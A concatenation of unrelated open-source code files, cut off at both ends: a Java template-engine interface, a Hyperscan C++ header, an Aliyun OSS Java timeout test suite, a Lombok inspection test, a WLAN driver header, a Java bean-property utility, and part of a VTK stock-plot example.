ITemplateEngineConfiguration configuration ); ITemplateEngineConfiguration getConfiguration(); /** * Return the identifier of the template engine. * * @return */ String getId(); /** * Create a new context to register Java model. * * @return */ IContext createContext(); /** * Create a new context to register Java model from the given Map. * * @param contextMap * @return */ IContext createContext( Map<String, Object> contextMap ); /** * Merge Java model coming from the given context with the XML file entryName of the given document archive and * modify the entry of the document archive. * * @param reportId {@link IXDocReport#getId()}. * @param entryName entry name of the XML file from the document archive which must be merged. This XML file is the * template. * @param readerProvider entry reader provider. * @param context Java model context * @throws XDocReportException * @throws IOException */ void process( String reportId, String entryName, IEntryReaderProvider readerProvider, IEntryWriterProvider writerProvider, IContext context ) throws XDocReportException, IOException; void process( String reportId, String entryName, IEntryReaderProvider readerProvider, Writer writer, IContext context ) throws XDocReportException, IOException; /** * Merge Java model coming from the given context with the given reader and register the merge result in the given * writer. 
* * @param entryName template name * @param context Java model context * @param reader template reader to merge * @param writer merge result writer * @throws XDocReportException * @throws IOException */ void process( String entryName, IContext context, Reader reader, Writer writer ) throws XDocReportException, IOException; void extractFields( Reader reader, String entryName, FieldsExtractor extractor ) throws XDocReportException; void extractFields( IEntryReaderProvider readerProvider, String entryName, FieldsExtractor extractor ) throws XDocReportException; IDocumentFormatter getDocumentFormatter(); /** * Merge Java model coming from the given context with the given template name and register the merge result in the * given writer. * * @param templateName template name * @param context Java model context * @param reader template reader to merge * @param writer merge result writer * @param closeWriter true if writer must be closed and false otherwise. * @throws IOException * @throws XDocReportException */ void process( String templateName, IContext context, Writer writer ) throws IOException, XDocReportException; boolean isFieldNameStartsWithUpperCase(); }
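A short, hedged sketch of how the interface above might be driven; it is not part of XDocReport. Only methods declared in ITemplateEngine are used (createContext(Map) and the Reader/Writer overload of process()); the engine instance itself is assumed to be obtained elsewhere (Freemarker, Velocity, ...), and the entry name "greeting" is a placeholder.

import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.HashMap;
import java.util.Map;

import fr.opensagres.xdocreport.core.XDocReportException;
import fr.opensagres.xdocreport.template.IContext;
import fr.opensagres.xdocreport.template.ITemplateEngine;

public class TemplateEngineSketch {

    public static String merge( ITemplateEngine engine, String templateContent )
        throws IOException, XDocReportException
    {
        // Build the Java model and wrap it in an engine-specific context.
        Map<String, Object> model = new HashMap<String, Object>();
        model.put( "name", "world" );
        IContext context = engine.createContext( model );

        // Merge the template (read from a Reader) and collect the result in a Writer.
        StringWriter out = new StringWriter();
        engine.process( "greeting", context, new StringReader( templateContent ), out );
        return out.toString();
    }
}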
/* release/src/router/samba3/source/tests/trivial.c (from ghsecuritylab/tomato_egg) */
#include <stdlib.h>

int main(void)
{
	exit(0);
}
/* * Copyright (c) 2017, Intel Corporation * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * * Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * Neither the name of Intel Corporation nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. */ /** \file * \brief exclusive analysis for infix and suffix engines. * Two engines are considered as exclusive if they can never be alive * at the same time. This analysis takes advantage of the property of * triggering literal + engine graph. If the triggering literals of * two engines can make all the states dead in each other's graph, * then they are exclusive. */ #ifndef ROSE_BUILD_EXCLUSIVE_H #define ROSE_BUILD_EXCLUSIVE_H #include "ue2common.h" #include "rose_build_impl.h" #include "util/alloc.h" #include "util/charreach.h" #include <map> #include <set> #include <vector> namespace ue2 { /** \brief role info structure for exclusive analysis */ template<typename role_id> struct RoleInfo { RoleInfo(role_id role_in, u32 id_in) : role(role_in), id(id_in) {} bool operator==(const RoleInfo &b) const { return id == b.id; } bool operator!=(const RoleInfo &b) const { return !(*this == b); } bool operator<(const RoleInfo &b) const { const RoleInfo &a = *this; if (a.score != b.score) { return a.score > b.score; } ORDER_CHECK(id); return false; } std::vector<std::vector<CharReach>> literals; // prefix literals CharReach prefix_cr; // reach of prefix literals CharReach last_cr; // reach of the last character of literals CharReach cr; // reach of engine graph const role_id role; // infix or suffix info const u32 id; // infix or suffix id u32 score = ~0U; // score for exclusive analysis }; /** * \brief add triggering literals to infix info. */ bool setTriggerLiteralsInfix(RoleInfo<left_id> &roleInfo, const std::map<u32, std::vector<std::vector<CharReach>>> &triggers); /** * \brief add triggering literals to suffix info. */ bool setTriggerLiteralsSuffix(RoleInfo<suffix_id> &roleInfo, const std::map<u32, std::vector<std::vector<CharReach>>> &triggers); /** * Exclusive analysis for infix engines. 
* * @param build rose build info mainly used to set exclusive chunk size here * @param vertex_map mapping between engine id and rose vertices * related to this engine * @param roleInfoSet structure contains role properties including infix info, * triggering literals and literal reachabilities. * Used for exclusive analysis. * @param exclusive_roles output mapping between engine id and its exclusive * group id */ void exclusiveAnalysisInfix(const RoseBuildImpl &build, const std::map<u32, std::vector<RoseVertex>> &vertex_map, std::set<RoleInfo<left_id>> &roleInfoSet, std::vector<std::vector<u32>> &exclusive_roles); /** * Exclusive analysis for suffix engines. * * @param build rose build info mainly used to set exclusive chunk size here * @param vertex_map mapping between engine id and rose vertices * related to this engine * @param roleInfoSet structure contains role properties including suffix info, * triggering literals and literal reachabilities. * Used for exclusive analysis. * @param exclusive_roles output mapping between engine id and its exclusive * group id */ void exclusiveAnalysisSuffix(const RoseBuildImpl &build, const std::map<u32, std::vector<RoseVertex>> &vertex_map, std::set<RoleInfo<suffix_id>> &roleInfoSet, std::vector<std::vector<u32>> &exclusive_roles); } // namespace ue2 #endif //ROSE_BUILD_EXCLUSIVE_H
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package com.aliyun.oss.integrationtests; import java.io.File; import java.io.InputStream; import java.util.Date; import java.util.Random; import junit.framework.Assert; import org.junit.After; import org.junit.Before; import org.junit.Ignore; import org.junit.Test; import com.aliyun.oss.ClientBuilderConfiguration; import com.aliyun.oss.ClientConfiguration; import com.aliyun.oss.ClientErrorCode; import com.aliyun.oss.ClientException; import com.aliyun.oss.OSS; import com.aliyun.oss.OSSClient; import com.aliyun.oss.OSSClientBuilder; import com.aliyun.oss.OSSErrorCode; import com.aliyun.oss.OSSException; import com.aliyun.oss.model.DownloadFileRequest; import com.aliyun.oss.model.OSSObject; import com.aliyun.oss.model.ObjectListing; import com.aliyun.oss.model.UploadFileRequest; /** * Testing request timeout */ @Ignore public class RequestTimeoutTest extends TestBase { private final static String endpoint = TestConfig.OSS_TEST_ENDPOINT; private final static String accessId = TestConfig.OSS_TEST_ACCESS_KEY_ID; private final static String accessKey = TestConfig.OSS_TEST_ACCESS_KEY_SECRET; private static String bucketName; private final static int requestTimeout = 10 * 1000; private static OSSClient ossClient; @SuppressWarnings("deprecation") @Before public void setUp() throws Exception { long ticks = new Date().getTime() / 1000 + new Random().nextInt(5000); bucketName = BUCKET_NAME_PREFIX + ticks; if (ossClient == null) { ClientConfiguration config = new ClientConfiguration(); config.setRequestTimeout(requestTimeout); config.setRequestTimeoutEnabled(true); //config.setMaxConnections(1); ossClient = new OSSClient(endpoint, accessId, accessKey, config); ossClient.createBucket(bucketName); } } @After public void tearDown() throws Exception { abortAllMultipartUploads(ossClient, bucketName); deleteBucketWithObjects(ossClient, bucketName); if (ossClient != null) { ossClient.shutdown(); ossClient = null; } } /** * Testing normal request. 
*/ @Test public void testObjectOperationsNormal() throws Exception { String key = "test-object-operation-normal"; try { // get ossClient.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(64)); // put OSSObject ossObject = ossClient.getObject(bucketName, key); ossObject.getObjectContent().close(); // delete ossClient.deleteObject(bucketName, key); // upload File file = createSampleFile(key, 1024 * 500); UploadFileRequest uploadFileRequest = new UploadFileRequest(bucketName, key); uploadFileRequest.setUploadFile(file.getAbsolutePath()); uploadFileRequest.setPartSize(1024 * 100); uploadFileRequest.setTaskNum(10); uploadFileRequest.setEnableCheckpoint(true); ossClient.uploadFile(uploadFileRequest); // download DownloadFileRequest downloadFileRequest = new DownloadFileRequest(bucketName, key); downloadFileRequest.setDownloadFile(file.getAbsolutePath()); downloadFileRequest.setTaskNum(10); downloadFileRequest.setEnableCheckpoint(true); ossClient.downloadFile(downloadFileRequest); ossClient.deleteObject(bucketName, key); file.delete(); } catch (Exception e) { Assert.fail(e.getMessage()); } catch (Throwable t) { Assert.fail(t.getMessage()); } } /** * Tests request with a new short timeout value */ @Test public void testRequestTimeoutEffective() throws Exception { String key = "test-request-timeout-effective"; try { ossClient.getClientConfiguration().setRequestTimeout(1); ossClient.getObject(bucketName, key); Assert.fail("Get object should not be successful"); } catch (ClientException e) { Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode()); } finally { ossClient.getClientConfiguration().setRequestTimeout(requestTimeout); } } /** * Negative test cases * Reading a non-existing bucket, object. * Uploading a null stream. * Uploading an object with 1ms timeout value. */ @Test public void testObjectOperationsNegative() throws Exception { String bucket = "test-object-operations-negative"; String key = "test-object-operations-negative"; try { ossClient.getBucketInfo(bucket); Assert.fail("Get bucket info should not be successful"); } catch (OSSException e) { Assert.assertEquals(OSSErrorCode.NO_SUCH_BUCKET, e.getErrorCode()); } try { ossClient.getObject(bucketName, key); Assert.fail("Get object should not be successful"); } catch (OSSException e) { Assert.assertEquals(OSSErrorCode.NO_SUCH_KEY, e.getErrorCode()); } try { InputStream inputStream = null; ossClient.putObject(bucket, key, inputStream); Assert.fail("Put object should not be successful"); } catch (Exception e) { Assert.assertTrue(e instanceof IllegalArgumentException); } try { ossClient.getClientConfiguration().setRequestTimeout(1); ossClient.getObject(bucketName, key); Assert.fail("Get object should not be successful"); } catch (ClientException e) { Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode()); } finally { ossClient.getClientConfiguration().setRequestTimeout(requestTimeout); } } /** * The connection should be reused after time out. 
     */
    @Test
    public void testOperationsNormalAfterTimeout() throws Exception {
        String key = "test-operation-after-timeout";

        try {
            try {
                ossClient.getClientConfiguration().setRequestTimeout(1);
                ossClient.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(64));
                Assert.fail("Put object should not be successful");
            } catch (ClientException e) {
                Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode());
            } finally {
                ossClient.getClientConfiguration().setRequestTimeout(requestTimeout);
            }

            ossClient.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(64));

            OSSObject ossObject = ossClient.getObject(bucketName, key);
            ossObject.getObjectContent().close();

            ossClient.deleteObject(bucketName, key);
        } catch (Exception e) {
            e.printStackTrace();
            Assert.fail(e.getMessage());
        }
    }

    /**
     * Test operations after packet loss.
     * To simulate packet loss, we use iptables on Linux and cut the network on Windows.
     */
    @Test
    public void testOperationsNormalAfterPacketLoss() throws Exception {
        String key = "test-operation-after-packet-loss";

        try {
            File file = createSampleFile(key, 1024 * 1024 * 200);

            //System.out.println("start disconnect");
            ossClient.getClientConfiguration().setRequestTimeout(60 * 60 * 1000);

            try {
                ossClient.putObject(bucketName, key, file);
                Assert.fail("Put object should not be successful");
            } catch (ClientException e) {
                Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode());
            } finally {
                ossClient.getClientConfiguration().setRequestTimeout(requestTimeout);
            }

            ObjectListing objectListing = ossClient.listObjects(bucketName, key);
            Assert.assertEquals(objectListing.getObjectSummaries().size(), 1);

            ossClient.deleteObject(bucketName, key);
        } catch (Exception e) {
            e.printStackTrace();
            Assert.fail(e.getMessage());
        }
    }

    /**
     * Massive concurrent requests. The request completion time should be similar.
     */
    @Test
    public void testConcurrentOperationsNormal() throws Exception {
        String key = "test-concurrent-operation-normal";

        try {
            ossClient.getClientConfiguration().setRequestTimeout(100 * 1000);

            Thread threads[] = new Thread[100];
            for (int i = 0; i < 100; i++) {
                threads[i] = new OperationThread(key + i);
            }

            for (int i = 0; i < 100; i++) {
                threads[i].start();
            }

            for (int i = 0; i < 100; i++) {
                threads[i].join();
            }
        } catch (Exception e) {
            e.printStackTrace();
            Assert.fail(e.getMessage());
        }
    }

    class OperationThread extends Thread {
        private String key;

        public OperationThread(String key) {
            this.key = key;
        }

        public void run() {
            for (int i = 0; i < 100; i++) {
                try {
                    ossClient.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(1024 * 10));
                    OSSObject ossObject = ossClient.getObject(bucketName, key);
                    ossObject.getObjectContent().close();
                    ossClient.deleteObject(bucketName, key);
                } catch (Exception e) {
                    e.printStackTrace();
                    Assert.fail(e.getMessage());
                }
            }
        }
    }

    /**
     * Multiple OSSClient instances test.
     * Each instance should work independently without being impacted by other instances.
     * A timeout in one instance should not cause timeouts in the others.
     *
     */
    @Test
    public void testMultiOssClientIndependent() throws Exception {
        String key = "test-multi-client-independent";

        try {
            ClientBuilderConfiguration config = new ClientBuilderConfiguration();
            config.setRequestTimeout(1);
            config.setRequestTimeoutEnabled(true);
            config.setMaxConnections(1);
            OSS client = new OSSClientBuilder().build(endpoint, accessId, accessKey, config);

            Thread threads[] = new Thread[10];
            for (int i = 0; i < 10; i++) {
                if (i % 2 == 0) {
                    threads[i] = new TimeoutOperationThread(client, key + i);
                } else {
                    threads[i] = new OperationThread(key + i);
                }
            }

            for (int i = 0; i < 10; i++) {
                threads[i].start();
            }

            for (int i = 0; i < 10; i++) {
                threads[i].join();
            }
        } catch (Exception e) {
            e.printStackTrace();
            Assert.fail(e.getMessage());
        }
    }

    class TimeoutOperationThread extends Thread {
        private String key;
        private OSS client;

        public TimeoutOperationThread(OSS client, String key) {
            this.client = client;
            this.key = key;
        }

        public void run() {
            for (int i = 0; i < 100; i++) {
                try {
                    client.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(1024 * 10));
                    Assert.fail("Put object should not be successful");
                } catch (ClientException e) {
                    Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode());
                }

                try {
                    client.getObject(bucketName, key);
                    Assert.fail("Get object should not be successful");
                } catch (ClientException e) {
                    Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode());
                }

                try {
                    client.deleteObject(bucketName, key);
                    Assert.fail("Delete object should not be successful");
                } catch (ClientException e) {
                    Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode());
                }
            }
        }
    }

    /**
     * Testing connection timeout.
     */
    @Test
    public void testClientConfigIndependent() throws Exception {
        String key = "test-client-config-independent";

        ClientBuilderConfiguration config = new ClientBuilderConfiguration();
        config.setRequestTimeout(requestTimeout);
        config.setRequestTimeoutEnabled(true);
        config.setConnectionTimeout(1);
        OSS client = new OSSClientBuilder().build(endpoint, accessId, accessKey, config);

        try {
            client.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(1024));
            Assert.fail("Put object should not be successful");
        } catch (ClientException e) {
            Assert.assertEquals(ClientErrorCode.CONNECTION_TIMEOUT, e.getErrorCode());
        } finally {
            client.shutdown();
        }
    }

    /**
     * Testing graceful exit after a request timeout.
     */
    @Test
    public void testExitNormalAfterTimeout() throws Exception {
        String key = "test-exit-after-timeout";

        ClientBuilderConfiguration config = new ClientBuilderConfiguration();
        config.setRequestTimeout(requestTimeout);
        config.setRequestTimeoutEnabled(true);
        config.setMaxConnections(1);
        OSS client = new OSSClientBuilder().build(endpoint, accessId, accessKey, config);

        try {
            client.putObject(bucketName, key, TestUtils.genFixedLengthInputStream(1024 * 10));
            Assert.fail("Put object should not be successful");
        } catch (ClientException e) {
            Assert.assertEquals(OSSErrorCode.REQUEST_TIMEOUT, e.getErrorCode());
        }
    }
}
6,906
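The RequestTimeoutTest above exercises one configuration pattern throughout: enable the per-request timeout on the client, issue a call, and expect a ClientException carrying OSSErrorCode.REQUEST_TIMEOUT when the call overruns. The following is a minimal sketch of that pattern for reference; the endpoint, credentials, bucket and key are placeholders, while the configuration and builder calls are the ones used in the tests above.

import com.aliyun.oss.ClientBuilderConfiguration;
import com.aliyun.oss.ClientException;
import com.aliyun.oss.OSS;
import com.aliyun.oss.OSSClientBuilder;

public class RequestTimeoutSketch {
    public static void main(String[] args) {
        // Placeholders -- substitute a real endpoint, credentials, bucket and key.
        String endpoint = "<endpoint>";
        String accessId = "<access-key-id>";
        String accessKey = "<access-key-secret>";

        ClientBuilderConfiguration config = new ClientBuilderConfiguration();
        config.setRequestTimeoutEnabled(true);  // switch the per-request timeout on
        config.setRequestTimeout(10 * 1000);    // 10 seconds, the same value the tests use

        OSS client = new OSSClientBuilder().build(endpoint, accessId, accessKey, config);
        try {
            client.getObject("<bucket>", "<key>");
        } catch (ClientException e) {
            // A call that overruns the timeout fails with a ClientException whose error
            // code is OSSErrorCode.REQUEST_TIMEOUT, which is what the tests above assert on.
            System.out.println("request failed: " + e.getErrorCode());
        } finally {
            client.shutdown();
        }
    }
}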
3,182
package de.plushnikov.intellij.plugin.inspection; import com.intellij.codeInspection.InspectionProfileEntry; /** * @author <NAME> */ public class DiverseInspectionTest extends LombokInspectionTest { @Override protected String getTestDataPath() { return TEST_DATA_INSPECTION_DIRECTORY + "/diverse"; } @Override protected InspectionProfileEntry getInspection() { return new LombokInspection(); } public void testDataEqualsAndHashCodeOverride() { doTest(); } public void testEqualsAndHashCodeCallSuper() { doTest(); } public void testIssue37() { doTest(); } public void testSetterOnFinalField() { doTest(); } // public void testValInspection() { // doTest(); // } }
244
3,084
<filename>network/wlan/WDI/COMMON/Hotspot20.h<gh_stars>1000+ #ifndef __INC_HOTSPOT20_H #define __INC_HOTSPOT20_H RT_STATUS GAS_OnInitReq( IN PADAPTER pAdapter, IN PRT_RFD pRfd, IN POCTET_STRING posMpdu ); RT_STATUS GAS_OnInitRsp( IN PADAPTER pAdapter, IN PRT_RFD pRfd, IN POCTET_STRING posMpdu ); RT_STATUS GAS_OnComebackReq( IN PADAPTER pAdapter, IN PRT_RFD pRfd, IN POCTET_STRING posMpdu ); RT_STATUS GAS_OnComebackRsp( IN PADAPTER pAdapter, IN PRT_RFD pRfd, IN POCTET_STRING posMpdu ); #endif // #ifndef __INC_HOTSPOT20_H
353
436
/* * Copyright 2003-2005 the original author or authors. * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ package com.jdon.jivejdon.util; import java.awt.Color; import java.beans.BeanInfo; import java.beans.IntrospectionException; import java.beans.Introspector; import java.beans.PropertyDescriptor; import java.lang.reflect.Method; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.StringTokenizer; import org.apache.logging.log4j.*; import com.jdon.jivejdon.domain.model.message.output.beanutil.FilterBeanInfo; /** * A utility class that provides methods that are useful for dealing with * Java Beans. */ public class BeanUtils { private final static Logger logger = LogManager.getLogger(BeanUtils.class); /** * Sets the properties of a Java Bean based on the String name/value pairs in * the specifieed Map. Because this method has to know how to convert a * String value into the correct type for the bean, only a few bean property * types are supported. They are: String, boolean, int, long, float, double, * Color, and Class.<p> * * If key/value pairs exist in the Map that don't correspond to properties * of the bean, they will be ignored. * * @param bean the JavaBean to set properties on. * @param properties String name/value pairs of the properties to set. */ public static void setProperties(Object bean, Map properties) { try { // Loop through all the property names in the Map for (Iterator iter = properties.keySet().iterator(); iter.hasNext();) { String propName = (String) iter.next(); try { // Create a property descriptor for the named property. If // the bean doesn't have the named property, an // Introspection will be thrown. PropertyDescriptor descriptor = new PropertyDescriptor(propName, bean.getClass()); // Load the class type of the property. Class propertyType = descriptor.getPropertyType(); // Get the value of the property by converting it from a // String to the correct object type. Object value = decode(propertyType, (String) properties.get(propName)); // Set the value of the bean. descriptor.getWriteMethod().invoke(bean, new Object[] { value }); logger.debug(" 1propName=" + propName + ":propValue=" + (String) properties.get(propName)); logger.debug(" 1propName=" + propName + ":propValue=" + value); } catch (IntrospectionException ie) { // Ignore. This exception means that the key in the map // does not correspond to a property of the bean. ie.printStackTrace(); logger.error("bean getWriteMethod invoke error propname=" + propName); } } } catch (Exception e) { e.printStackTrace(); } } /** * Gets the properties from a Java Bean and returns them in a Map of String * name/value pairs. Because this method has to know how to convert a * bean property into a String value, only a few bean property * types are supported. They are: String, boolean, int, long, float, double, * Color, and Class. * * @param bean a Java Bean to get properties from. * @return a Map of all properties as String name/value pairs. 
*/ public static Map getProperties(Object bean) { Map properties = new HashMap(); try { logger.debug("getProperties=" + bean.getClass().getName()); BeanInfo beanInfo = Introspector.getBeanInfo(bean.getClass(), Object.class); // Loop through all properties of the bean. PropertyDescriptor[] descriptors = beanInfo.getPropertyDescriptors(); String[] names = new String[descriptors.length]; for (int i = 0; i < names.length; i++) { // Determine the property name. String name = descriptors[i].getName(); Method methodc = descriptors[i].getReadMethod(); logger.debug("name=" + name); logger.debug("Method=" + methodc.getName()); // Decode the property value using the property type and // encoded String value. Object[] args = null; Object value = methodc.invoke(bean, args); // Add to Map, encoding the value as a String. properties.put(name, encode(value)); } } catch (Exception e) { e.printStackTrace(); } return properties; } /** * Returns the PropertyDescriptor array for the specified Java Bean Class. * The method also does a special check to see of the bean has a BeanInfo * class that extends the JiveBeanInfo class. If yes, we load the * PropertyDescriptor array directly from that BeanInfo class rather than * through the Introspector in order to preserve the desired ordering of * properties. * * @param beanClass the Class of the JavaBean. * @return the PropertyDescriptor array for the specified Java Bean Class. */ public static PropertyDescriptor[] getPropertyDescriptors(Class beanClass) throws IntrospectionException { // See if the Java Bean has a BeanInfo class that implements // JiveBeanInfo. If so, return the PropertyDescriptor from that // class. This will bypass properties of parent classes, but this is // the normal behavior of classes that implement JiveBeanInfo. try { FilterBeanInfo beanInfo = (FilterBeanInfo) Class.forName(beanClass.getName() + "BeanInfo").newInstance(); return beanInfo.getPropertyDescriptors(); } catch (Exception e) { logger.error(e); } // Otherwise, return the PropertyDescriptors from the Introspector. return Introspector.getBeanInfo(beanClass, Object.class).getPropertyDescriptors(); } /** * Encodes a bean property value as a String. If the object type is not * supported, null will be returned. * * @param value an Object to encode in a String representation. */ private static String encode(Object value) { if (value instanceof String) { return (String) value; } if (value instanceof Boolean || value instanceof Integer || value instanceof Long || value instanceof Float || value instanceof Double) { return value.toString(); } if (value instanceof Color) { Color color = (Color) value; return color.getRed() + "," + color.getGreen() + "," + color.getBlue(); } if (value instanceof Class) { return ((Class) value).getName(); } return null; } /** * Decodes a String into an object of the specified type. If the object * type is not supported, null will be returned. * * @paran type the type of the property. * @param the encode String value to decode. * @return the String value decoded into the specified type. 
*/ private static Object decode(Class type, String value) throws Exception { if (type.getName().equals("java.lang.String")) { return value; } if (type.getName().equals("boolean")) { return Boolean.valueOf(value); } if (type.getName().equals("int")) { return Integer.valueOf(value); } if (type.getName().equals("long")) { return Long.valueOf(value); } if (type.getName().equals("float")) { return Float.valueOf(value); } if (type.getName().equals("double")) { return Double.valueOf(value); } if (type.getName().equals("java.awt.Color")) { StringTokenizer tokens = new StringTokenizer(value, ","); int red = Integer.parseInt(tokens.nextToken()); int green = Integer.parseInt(tokens.nextToken()); int blue = Integer.parseInt(tokens.nextToken()); return new Color(red, green, blue); } if (type.getName().equals("java.lang.Class")) { return Class.forName(value); } return null; } }
3,531
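BeanUtils above documents its contract only in Javadoc, so a short usage sketch may help. SampleBean is an invented illustration class, not part of the original source, and only property types the Javadoc lists as supported (String, int) are used.

import java.util.HashMap;
import java.util.Map;

import com.jdon.jivejdon.util.BeanUtils;

public class BeanUtilsSketch {

    // Hypothetical bean, used only to illustrate the calls.
    public static class SampleBean {
        private String name;
        private int size;

        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
        public int getSize() { return size; }
        public void setSize(int size) { this.size = size; }
    }

    public static void main(String[] args) {
        SampleBean bean = new SampleBean();

        // String name/value pairs; setProperties converts each value to the property type.
        Map<String, String> props = new HashMap<String, String>();
        props.put("name", "demo");
        props.put("size", "42");
        BeanUtils.setProperties(bean, props);

        // The reverse direction: every readable property encoded back to a String.
        Map<?, ?> encoded = BeanUtils.getProperties(bean);
        System.out.println(encoded); // e.g. {name=demo, size=42}
    }
}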
309
#include <vtkActor.h> #include <vtkAppendPolyData.h> #include <vtkCamera.h> #include <vtkFollower.h> #include <vtkLinearExtrusionFilter.h> #include <vtkNamedColors.h> #include <vtkOutlineFilter.h> #include <vtkPolyDataMapper.h> #include <vtkPolyDataReader.h> #include <vtkProperty.h> #include <vtkRenderer.h> #include <vtkRenderWindow.h> #include <vtkRenderWindowInteractor.h> #include <vtkRibbonFilter.h> #include <vtkTubeFilter.h> #include <vtkSmartPointer.h> #include <vtkSphereSource.h> #include <vtkTransform.h> #include <vtkTransformPolyDataFilter.h> #include <vtkVectorText.h> #include <vtksys/SystemTools.hxx> #include <string> namespace { void AddStock(std::vector<vtkSmartPointer<vtkRenderer>> renderers, char *filename, std::string name, double &zPosition, bool useTubes); } int main (int argc, char *argv[]) { vtkSmartPointer<vtkNamedColors> colors = vtkSmartPointer<vtkNamedColors>::New(); // set up the stocks std::vector<vtkSmartPointer<vtkRenderer>> renderers; vtkSmartPointer<vtkRenderer> topRenderer = vtkSmartPointer<vtkRenderer>::New(); vtkSmartPointer<vtkRenderer> bottomRenderer = vtkSmartPointer<vtkRenderer>::New(); renderers.push_back(topRenderer); renderers.push_back(bottomRenderer); bool useTubes = true; if (atoi(argv[argc-1]) == 1) { useTubes = false; } double zPosition = 0.0; for (int i = 1; i < argc - 1; ++i) { AddStock(renderers, argv[i], vtksys::SystemTools::GetFilenameWithoutExtension(argv[i]), zPosition, useTubes); } // Setup render window and interactor vtkSmartPointer<vtkRenderWindow> renderWindow = vtkSmartPointer<vtkRenderWindow>::New(); renderWindow->AddRenderer(renderers[0]); renderWindow->AddRenderer(renderers[1]); vtkSmartPointer<vtkRenderWindowInteractor> renderWindowInteractor = vtkSmartPointer<vtkRenderWindowInteractor>::New(); renderWindowInteractor->SetRenderWindow(renderWindow); renderers[0]->SetViewport(0.0, .4, 1.0, 1.0); renderers[1]->SetViewport(0.0, 0.0, 1.0, .4); renderers[0]->GetActiveCamera()->SetViewAngle(5.0); renderers[0]->ResetCamera(); renderers[0]->GetActiveCamera()->Zoom(1.4); renderers[0]->ResetCameraClippingRange(); renderers[0]->SetBackground(colors->GetColor3d("SteelBlue").GetData()); renderers[1]->GetActiveCamera()->SetViewUp(0, 0, -1); renderers[1]->GetActiveCamera()->SetPosition(0, 1, 0); renderers[1]->GetActiveCamera()->SetViewAngle(5.0); renderers[1]->ResetCamera(); renderers[1]->GetActiveCamera()->Zoom(2.2); renderers[1]->ResetCameraClippingRange(); renderers[1]->SetBackground(colors->GetColor3d("LightSteelBlue").GetData()); renderWindow->SetSize(500, 800); renderWindow->Render(); renderWindowInteractor->Start(); return EXIT_SUCCESS; } namespace { // create the stocks void AddStock(std::vector<vtkSmartPointer<vtkRenderer>> renderers, char *filename, std::string name, double &zPosition, bool useTubes) { std::cout << "Adding " << name << std::endl; // read the data vtkSmartPointer<vtkPolyDataReader> PolyDataRead = vtkSmartPointer<vtkPolyDataReader>::New(); PolyDataRead->SetFileName(filename); PolyDataRead->Update(); // create labels vtkSmartPointer<vtkVectorText> TextSrc = vtkSmartPointer<vtkVectorText>::New(); TextSrc->SetText(name.c_str()); vtkIdType numberOfPoints = PolyDataRead->GetOutput()->GetNumberOfPoints(); double nameLocation[3]; double x, y, z; vtkIdType nameIndex = (numberOfPoints - 1) * .8; PolyDataRead->GetOutput()->GetPoint(nameIndex, nameLocation); x = nameLocation[0] * .15; y = nameLocation[1] + 5.0; z = zPosition; // Create a tube and ribbpn filter. 
